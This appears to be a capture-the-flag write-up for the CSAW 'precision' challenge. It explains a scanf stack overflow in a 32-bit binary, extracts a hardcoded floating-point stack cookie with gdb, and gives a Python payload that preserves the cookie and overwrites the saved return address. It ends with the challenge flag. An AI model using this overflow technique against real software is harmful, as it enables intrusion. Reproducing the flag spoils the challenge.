CSAW CTF – Exploitables100 – precision

The given 32-bit ELF reads user input with scanf("%s", &buf), which imposes no length limit and so allows a stack buffer overflow. Just before returning, the function performs a floating point comparison:

.text:08048529 fld ds:floating_num
.text:0804852F fstp [esp+0A0h+check]

.text:08048596 fld [esp+0A0h+check]
.text:0804859D fld ds:floating_num
.text:080485A3 fucomip st, st(1)
.text:080485A5 fstp st
.text:080485A7 jz short ret

The floating point number is a 64-bit double that acts as a stack cookie: the value stored on entry must still compare equal on return. Since this value is hardcoded, just fetch it from the binary and preserve it during the overwrite:

gdb-peda$ x/gx 0x08048690
0x8048690: 0x40501555475a31a5

So construct a payload like the one below to control EIP:

import struct

EIP = 0x41414141  # placeholder: the address execution should return to
payload = b"A" * 128                               # fill the 128-byte buffer
payload += struct.pack("<Q", 0x40501555475a31a5)  # restore the cookie's exact bytes
payload += b"A" * 12                              # padding up to the saved return address
payload += struct.pack("<I", EIP)                 # overwrite the saved EIP

Flag is flag{1_533_y0u_kn0w_y0ur_w4y_4r0und_4_buff3r}